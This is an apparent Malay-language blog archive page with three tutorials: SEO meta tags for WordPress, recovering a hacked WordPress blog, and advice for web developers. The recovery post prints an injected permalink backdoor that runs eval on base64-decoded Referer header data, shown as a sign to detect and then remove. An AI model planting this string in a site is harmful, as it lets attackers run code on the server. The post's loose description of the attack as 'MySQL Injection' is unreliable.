Mencari sesuatu mengenai panduan blog, agama, berita dari internet, video menarik dan isu semasa.

Archive for the Tutorial

Perkara paling penting sebelum…

Semalam saya ada buat satu pengumuman mengatakan saya telah mengunakan theme baru. Ya, sekarang blog saya kelihatan ‘blue’ memang saya minat warna biru :P

Jadi hari ini saya nak berkongsi satu ilmu basic dalam dunia internet. Ramai yang saya perhatikan tidak mengunakan cara ini. Sedangkan cara ini amat penting untuk memastikan blog kita di index oleh search engine. Perkara paling menarik ialah free trafik daripada search engine.

Setiap kali saya menukar theme, atau skins website saya. Saya akan pastikan code-code ini berada di theme tersebut.

<meta name=”keywords” content=”keyword yang berkaitan dengan blog” />
<meta name=”Description” content=”Ceritakan sedikit mengenai blog anda.” />

Sekarang bagaimana anda dapat melihat code-code tersebut?

Apa yang anda perlu buat ialah login ke WP-ADMIN anda, selepas itu pergi ke Appearance -> Editor, sebelah kanan anda akan nampak Theme Files, Carikan files header.php, sekarang anda boleh lihat code-code yang tertera di situ.

meta-keywords

Di atas adalah code-code yang ada di blog saya. Pada mulanya tiada code-code tersebut, jadi saya terpaksa membuatnya kembali.

Jika anda perasan, di situ ada tambahan code.

<meta name=”verify-v1″ content=”diambil dari google webmaster” />

Code ini adalah kegunaan robot google untuk detect website ini berada di dalam akaun saya, anda boleh dapatkan di Google Webmaster di mana anda verify dan submitkan sitemap anda.

Rasanya sampai sini dulu, tutorial ringkas dari saya..

Popularity: 47% [?]

Dalam diam blog saya di hack oleh orang yang tidak bertanggungjawab!

Salam, blog peribadi saya ini telah terkena hack oleh seseorang yang tidak tahu kenapa masalah dia dengan saya :(. Tapi alhamdulilah saya dapat mengesannya dengan segera! Mungkin saya perasan 2 hari selepas post terakhir saya Percaya atau tidak saya memang tak boleh nak ber’blog yang telah di buat pada hari Rabu hari tu.

Sudahlah saya ni jarang update blog, tiba-tiba blog url pun kena hack :(. Tapi tidak mengapa, sebab saya telah berjaya solvekan problem ini. Masalah yang akan timbul selepas terkena hack ini ialah, seo blog anda akan lari serta merta, kerana user yang akan masuk ke blog atau post, akan mengalami masalah loading yang lama.

Pada tahun lepas, banyak blog wordpress yang telah terkena virus hack ini :P, selalu nya orang yang tidak beretika ini akan mengunakan cara yang di panggil “MySQL Injection”, itu lah kelemahan platform yang ada, sebab mempunyai hole ke MySQL.

Anda boleh tengok image di bawah bagaimana untuk detect website anda terkena hack versi ini :-

blog-kena-hack

Pada mulanya, anda kena meletakkan mouse di blog post anda (title) seperti gambar di atas.

Selepas itu anda tengok di browser anda, seperti gambarajah di bawah :-

url-blog-kena-hack

[KLIK IMAGE PAPARAN BESAR]

Anda akan dapat melihat code sesat ini :-

&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&

Sekarang cara untuk solve problem ini :-

Login ke Cpanel anda, dan pergi ke phpMyAdmin.

Klik kepada database wordpress anda

Cari wp-options table, seperti gambar di bawah:-

phpMyAdminphpMyAdmin-browse-view

 

 

 

Anda boleh meneruskan langkah seperti di bawah

phpMyAdmin-permalink

 

 

 

 

Sila ikuti langkah-langkah di atas, saya mengunakan image mungkin memudahkan anda lagi :) Gambar di bawah menunjukkan bagaimana anda boleh mengubah permalink tersebut.

phpMyAdmin-ubah-permalink

 

 

 

 

 

 

Saya rasa sudah memadai, jika anda mempunyai masalah dalam masalah ini, anda boleh terus menghubungi saya untuk membantu anda :) Anda boleh menghubungi saya di Contact Me

Popularity: 35% [?]

Panduan seorang developer.

Ringkas sahaja tajuk untuk post kali ini, dan harap dapat membantu bakal developer yang baru ingin menjinakkan diri dalam bidang ini. Memang salah satu pendapatan internet adalah menjadi seseorang developer. Tetapi harus di ingat, ini bukan satu kerja yang mudah. Developer yang saya maksudkan disini ialah tukang membuat website untuk seseorang yang menempah website dari mereka, tidak kiralah webjualan, e-store, mahupun website komuniti.

Kerja seorang developer teramat susah, kerana mereka perlu memberikan banyak masa untuk website-website yang ingin mereka bina. Contoh, mereka mempunyai pelanggan yang inginkan website kesihatan. Jadi seseorang developer yang mahir, mereka perlu tahu software/script yang paling mudah untuk dibina. Selain itu, mereka juga perlu mengkaji sedikit sebanyak bahasa-bahasa programmer seperti php,javascript, dan macam-macam lagi.

Untuk menjadi seorang developer yang baik, mereka perlu lah memberi support yang sempurna ataupun memberikan sesuatu tawaran untuk pelanggan mereka. Tawaran yang saya maksud kan ialah, memberi perkhidmatan percuma selama setahun. Jadi ini akan dapat memberi jaminan kepada pelanggan mereka, supaya berpuas hati.

Jika anda adalah salah seorang pelanggan developer, anda perlu hargai mereka. Kerana mereka ibarat tulang belakang untuk anda. Jadi jangan sia-siakan kemahiran mereka. Anda mungkin boleh mencari panduan sendiri dengan niat tidak mahu menggunakan perkhidmatan developer. Tetapi tahukah anda berapa lama masa yang ada ingin ambil? mungkin 1 tahun dan mungkin juga 2 tahun. Jadi nasihat saya, berfikir terlebih dahulu sebelum melakukan projek-projek online anda.

p/s: ini adalah salah satu pendapatan internet saya :P

Popularity: 26% [?]